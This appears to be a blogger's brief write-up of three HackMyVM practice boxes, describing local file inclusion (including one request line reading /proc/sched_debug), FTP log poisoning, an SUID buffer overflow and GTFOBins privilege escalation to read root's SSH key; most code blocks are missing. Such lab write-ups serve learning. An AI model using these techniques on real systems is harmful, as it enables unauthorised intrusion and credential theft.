I’ve done a few more HackMyVM boxes: Superhuman, Brain and Eyes. Superhuman and Brain were Easy rated, Eyes is Medium.
This was essentially weaponised guessing, followed by GTFOBins privesc (I think, I didn’t take notes). The only interesting (?) command was this one:
Also I guess ciphey was actually useful which tbh was a first for me:
This was an LFI to obtain a password for the foothold and then connecting to an internal service to get another password for the privesc. The only interesting part here was that the file to include was /proc/sched_debug which doesn’t appear in the standard seclists entries for LFI fuzzing. So that was interesting.
GET /brainstorm/file.php?file=/proc/sched_debug HTTP/1.1
This was another LFI, but this time we had access to an anonymous FTP server which gave us the LFI parameter straight up so no fuzzing required. No write access to FTP.
What’s in the file?
So we have a username, and anyway we can include /etc/passwd and confirm. Monica doesn’t have an SSH key (spoiler alert) so we can’t read it even if we had permission, which we don’t. We can include /var/log/vsftpd.log so that means we can log poison:
This was the most interesting part here. We have an SUID binary in /opt/ls, along with some C code and a note (the note says something about creating a new version of ls).
So here we the ability to overflow:
So now just change the last ‘id’ to ‘sh’ and get a shell. Privesc is GTFOBins:
This gives us a privileged read, and root has an SSH key: